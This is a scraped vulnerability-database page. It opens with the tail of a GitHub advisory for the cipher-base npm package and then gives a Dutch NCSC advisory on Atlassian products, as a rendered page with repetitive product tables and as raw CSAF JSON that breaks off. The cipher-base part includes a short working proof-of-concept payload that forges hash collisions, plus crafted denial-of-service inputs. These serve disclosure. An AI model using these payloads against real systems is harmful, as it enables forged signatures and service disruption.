forgeHash(Buffer.concat(validMessage), \u0027Hashed input means safe\u0027)\nconst receivedMessage = JSON.parse(payload) // e.g. over network, whatever\n\nconsole.log(sha256(...validMessage))\nconsole.log(sha256(...receivedMessage))\nconsole.log(receivedMessage[0])\n```\n\nOutput:\n```\n9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9\n9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9\nHashed input means safe\n```\n\nThis works with:\n```js\nconst forgeHash = (valid, wanted) =\u003e JSON.stringify([wanted, { length: -wanted.length }, { ...valid, length: valid.length }])\n```\n\nBut there are other types of input which lead to unchecked results\n\n### Impact\n\n1. Hash state rewind on `{length: -x}`. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.\n2. Value miscalculation, e.g. a collision is generated by `{ length: buf.length, ...buf, 0: buf[0] + 256 }`\n This will result in the same hash as of `buf`, but can be treated by other code differently (e.g. bn.js)\n4. DoS on `{length:\u00271e99\u0027}`\n5. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration, like [GHSA-vjh7-7g9h-fjfh](https://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh))\n6. Also, other typed arrays results are invalid, e.g. returned hash of `new Uint16Array(5)` is the same as `new Uint8Array(5)`, not `new Uint16Array(10)` as it should have been (and is in Node.js `crypto`) -- same for arrays with values non-zero, their hashes are just truncated to `%256` instead of converted to correct bytelength",
"id": "GHSA-cpq7-6gpm-g9rc",
"modified": "2025-11-03T21:34:22Z",
"published": "2025-08-21T14:47:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287"
},
{
"type": "WEB",
"url": "https://github.com/browserify/cipher-base/pull/23"
},
{
"type": "WEB",
"url": "https://github.com/browserify/cipher-base/commit/8fd136432ca298a664f5637629cf2b42a6c7f294"
},
{
"type": "PACKAGE",
"url": "https://github.com/browserify/cipher-base"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N",
"type": "CVSS_V4"
}
],
"summary": "cipher-base is missing type checks, leading to hash rewind and passing on crafted data"
}
NCSC-2026-0034
Vulnerability from csaf_ncscnl - Published: 2026-01-22 09:03 - Updated: 2026-01-22 09:03Summary
Kwetsbaarheden verholpen in Atlassian producten
Notes
The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:
NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.
NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.
This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings.
Feiten: Atlassian heeft kwetsbaarheden verholpen in verschillende producten, welke gebruik maken van Oracle middle-ware producten zoals de Oracle Utilities Application Framework, WebLogic Server, Data Integrator en Business Intelligence Enterprise Edition.
Interpretaties: Deze kwetsbaarheden stellen ongeauthenticeerde aanvallers in staat om een denial of service (DoS) of om zich toegang te verschaffen tot gevoelige gegevens.
Een reeks kwetsbaarheden is afkomstig van diverse Oracle-middleware software, welke in Atlassian-producten is verwerkt. Deze kwetsbaarheden zijn verholpen in de Critical Patch Update van januari 2026 van Oracle en verwerkt in de getroffen Atlassian producten.
Oplossingen: Atlassian heeft updates uitgebracht om de kwetsbaarheden te verhelpen. Zie bijgevoegde referenties voor meer informatie.
Kans: medium
Schade: high
CWE-20: Improper Input Validation
CWE-23: Relative Path Traversal
CWE-121: Stack-based Buffer Overflow
CWE-285: Improper Authorization
CWE-287: Improper Authentication
CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CWE-400: Uncontrolled Resource Consumption
CWE-404: Improper Resource Shutdown or Release
CWE-459: Incomplete Cleanup
CWE-611: Improper Restriction of XML External Entity Reference
CWE-697: Incorrect Comparison
CWE-770: Allocation of Resources Without Limits or Throttling
CWE-787: Out-of-bounds Write
CWE-863: Incorrect Authorization
CWE-918: Server-Side Request Forgery (SSRF)
CWE-937: CWE-937
CWE-1035: CWE-1035
CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CWE-1333: Inefficient Regular Expression Complexity
Recent updates address critical security vulnerabilities across various software, including Ansible, Node.js, and Golang packages, with significant fixes for ReDoS and sensitive data exposure issues.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Multiple versions of the semver package are vulnerable to Regular Expression Denial of Service (ReDoS) through the new Range function, prompting updates in various products to mitigate this risk.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Multiple Oracle products, including Utilities Application Framework, WebLogic Server, Data Integrator, and Business Intelligence Enterprise Edition, have vulnerabilities allowing unauthenticated denial of service attacks, all with a CVSS score of 7.5.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Recent updates across various AWS packages, Node.js versions, and Python libraries address security vulnerabilities, enhance functionality, and improve performance, while several vulnerability reports highlight critical issues in Oracle Communications, HPE Unified OSS Console, and the cross-spawn package.
CWE-1333 - Inefficient Regular Expression ComplexityAffected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Apache Tomcat versions 11.0.0-M1 to 11.0.0-M20, 10.1.0-M1 to 10.1.24, and 9.0.13 to 9.0.89 are vulnerable to OutOfMemoryError and Denial of Service due to improper TLS handshake handling.
8.6 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Multiple vulnerabilities in the path-to-regexp library and related components can lead to Denial of Service (DoS) attacks, particularly affecting Node.js applications and IBM App Connect Enterprise due to backtracking regex issues.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Multiple vulnerabilities across Oracle products and DOMPurify allow for data compromise, denial of service, and XSS attacks, with CVSS scores ranging from 6.3 to 7.3.
7.3 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Oracle Database Server versions 23.4.0-23.26.0 have a vulnerability in the Fleet Patching and Provisioning component, while Eclipse Jersey versions 2.45, 3.0.16, and 3.1.9 may ignore critical SSL configurations due to a race condition.
8.7 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
The `qs` module's `arrayLimit` option is vulnerable to denial-of-service attacks due to its failure to enforce limits for bracket notation, allowing attackers to exploit memory exhaustion.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Recent vulnerabilities in axios, pgadmin4, and HPE software expose systems to SSRF and credential leakage, particularly through the use of absolute URLs, necessitating updates to mitigate these risks.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Multiple vulnerabilities have been identified in Oracle Financial Services and Retail products, as well as the Spring Framework, allowing unauthorized access to sensitive data and potentially leading to information disclosure.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Multiple denial-of-service vulnerabilities have been identified in Oracle Application Testing Suite, Oracle Agile PLM, Apache Commons FileUpload, and HPE IceWall Identity Manager, with CVSS scores of 7.5 for some products.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Recent updates for Apache Tomcat versions 9, 10, and 11 address the 'MadeYouReset' DoS vulnerability and other issues, with specific versions being susceptible to Denial of Service attacks from malformed client requests.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Multiple vulnerabilities in the Oracle Enterprise Data Quality product and PostgreSQL JDBC Driver allow unauthorized access and insecure authentication, with CVSS scores indicating significant risk.
8.2 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Apache Tomcat versions 9.0.0.M1 to 9.0.106 have multiple vulnerabilities, including a race condition affecting HTTP/2 connections and denial of service flaws, alongside issues in Oracle Graph Server and HPE Unified OSS Console.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Multiple vulnerabilities affect Oracle Communications Unified Assurance and Oracle Business Intelligence Enterprise Edition, allowing denial of service attacks, while older jackson-core versions are prone to StackoverflowErrors when parsing nested data.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Apache Jackrabbit versions prior to 2.23.2 are vulnerable to blind XXE attacks due to an unsecured document build for loading privileges.
8.8 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Apache Tika versions 1.13 to 3.2.1 have a critical XXE vulnerability, while Oracle PeopleSoft's OpenSearch component in versions 8.60 to 8.62 is also affected by an easily exploitable vulnerability.
9.8 (Critical)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Recent updates to Netty and Oracle Communications products address critical vulnerabilities, including the 'MadeYouReset' attack in HTTP/2, which can lead to denial of service and resource exhaustion.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Apache Tomcat versions 1.0.0-M1 to 11.0.10 are vulnerable to a directory traversal issue that may allow remote code execution if HTTP PUT requests are enabled, alongside other security vulnerabilities in HPE UOCAM.
8.1 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Apache Struts versions 2.0.0 to 6.7.0 and 7.0.0 to 7.0.3 have a Denial of Service vulnerability due to file leak in multipart request processing, affecting NetApp products.
7.5 (High)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
Apache Tika has multiple critical XML External Entity (XXE) injection vulnerabilities, particularly affecting PDF parsing, allowing remote attackers to exploit crafted documents for sensitive data disclosure and remote code execution.
10.0 (Critical)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
The document outlines a vulnerability in the `create-hash` package due to inadequate input type checks, leading to potential hash state manipulation and security risks, particularly in the `cipher-base` npm package versions up to 1.0.4.
9.1 (Critical)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
The document outlines a vulnerability in `sha.js` versions up to 2.4.11 due to insufficient input type checks, leading to potential denial of service and private key extraction risks.
9.1 (Critical)
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
A high severity XXE vulnerability in Crowd Data Center and Server version 7.1.0 has a CVSS score of 7.9, allowing authenticated attackers to access sensitive content without user interaction.
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Atlassian / Bamboo
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Bitbucket
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Confluence
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crowd Server
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Crucible
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Fisheye
|
vers:unknown/* | ||
|
vers:unknown/*
Atlassian / Jira
|
vers:unknown/* |
References
26 references
| URL | Category |
|---|---|
| https://confluence.atlassian.com/security/securit… | external |
| https://vulnerabilities.ncsc.nl/csaf/v2/2021/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2022/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2022/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "nl",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:\n\n NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.\n\n NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.\n This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
},
{
"category": "description",
"text": "Atlassian heeft kwetsbaarheden verholpen in verschillende producten, welke gebruik maken van Oracle middle-ware producten zoals de Oracle Utilities Application Framework, WebLogic Server, Data Integrator en Business Intelligence Enterprise Edition.",
"title": "Feiten"
},
{
"category": "description",
"text": "Deze kwetsbaarheden stellen ongeauthenticeerde aanvallers in staat om een denial of service (DoS) of om zich toegang te verschaffen tot gevoelige gegevens.\nEen reeks kwetsbaarheden is afkomstig van diverse Oracle-middleware software, welke in Atlassian-producten is verwerkt. Deze kwetsbaarheden zijn verholpen in de Critical Patch Update van januari 2026 van Oracle en verwerkt in de getroffen Atlassian producten.",
"title": "Interpretaties"
},
{
"category": "description",
"text": "Atlassian heeft updates uitgebracht om de kwetsbaarheden te verhelpen. Zie bijgevoegde referenties voor meer informatie.",
"title": "Oplossingen"
},
{
"category": "general",
"text": "medium",
"title": "Kans"
},
{
"category": "general",
"text": "high",
"title": "Schade"
},
{
"category": "general",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "general",
"text": "Relative Path Traversal",
"title": "CWE-23"
},
{
"category": "general",
"text": "Stack-based Buffer Overflow",
"title": "CWE-121"
},
{
"category": "general",
"text": "Improper Authorization",
"title": "CWE-285"
},
{
"category": "general",
"text": "Improper Authentication",
"title": "CWE-287"
},
{
"category": "general",
"text": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"title": "CWE-362"
},
{
"category": "general",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "general",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "general",
"text": "Incomplete Cleanup",
"title": "CWE-459"
},
{
"category": "general",
"text": "Improper Restriction of XML External Entity Reference",
"title": "CWE-611"
},
{
"category": "general",
"text": "Incorrect Comparison",
"title": "CWE-697"
},
{
"category": "general",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "general",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "general",
"text": "Incorrect Authorization",
"title": "CWE-863"
},
{
"category": "general",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
},
{
"category": "general",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "general",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "general",
"text": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
"title": "CWE-1321"
},
{
"category": "general",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
}
],
"publisher": {
"category": "coordinator",
